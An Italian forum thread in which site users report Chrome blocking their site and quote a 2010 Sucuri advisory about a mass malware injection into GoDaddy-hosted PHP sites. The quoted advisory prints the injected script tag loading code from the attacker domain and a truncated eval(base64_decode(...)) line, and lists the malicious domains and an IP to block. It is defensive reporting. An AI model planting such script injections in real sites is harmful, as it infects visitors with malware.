Questa mattina google chrome mi ha bloccato l'accesso al sito poiche' lo riteneva "infettato" dal malware "myblindstudioinfoonline" facendo una ricerca ho trovato quanto segue, forse i rallentamenti segnalati negli ultimi giorni (che ho riscontrato anche io) sono dovuti a questo:


Posted on September 17, 2010 by dd
We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours.

All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="http://myblindstudioinfoonline.com/ll.php"

Which are generated by a very long eval(base64_decode line:

eval(base64_decode("aWYoZnVuY3Rpb....

Here is the malware entry our scanner is detecting:



Note that the domain myblindstudioinfoonline dot com (77.78.239.53) is not blacklisted, so it has the potential to infect a very larger of visitors, specifically visitors with outdated AV signatures and definitions.

What’s interesting is that the domain is registered by the same people responsible for the previous attacks at Godaddy, Bluehost, etc: Hillary Kneber:

Registrant Contact:
HardSoft, inc
Hilary Kneber
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us
Administrative Contact:
Hilary Kneber
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us
The following script should clean up any infected site: http://blog.sucuri.net/2010/05/simp...for-latest.html

UPDATES:

*Other domains being used in this attack: http://www3.security-power31.co.cc, http://www4.megaav-soft74.co.cc, etc.

**Any ISP/Hosting provider should block this IP: 77.78.239.53

We will post more details as we learn. Thanks to Peter Casier from http://www.blogtips.org/ for the help.

La fonte è: http://sucuri.net

____________
invernorosso
L'essenziale è invisibile agli occhi.

confermo l'esistenza del problema che ho segnalato anche sul gruppo facebook. in pratica è stato un attacco generalizzato ai siti dell'host godaddy. Questo ha inserito all'inizio del codice di ogni pagina php un'ulteriore codice.
bisogna eliminare questa parte di codice in migliaia e migliaia di pagine. Ho scritto all'assistenza e sto aspettando il programmatore. io non mi prendo la responsabilità da solo di avviare la procedura :-)

Usa linux o un mac e i problemi di malware durante la nigazione internet non esistono piu'

sembra che l'assistenza abbia risolto il problema

confermo....

Rapisarda ha scritto: [Visualizza Messaggio]

confermo....

anche io nn risonto piu' del problema.

____________
invernorosso
L'essenziale è invisibile agli occhi.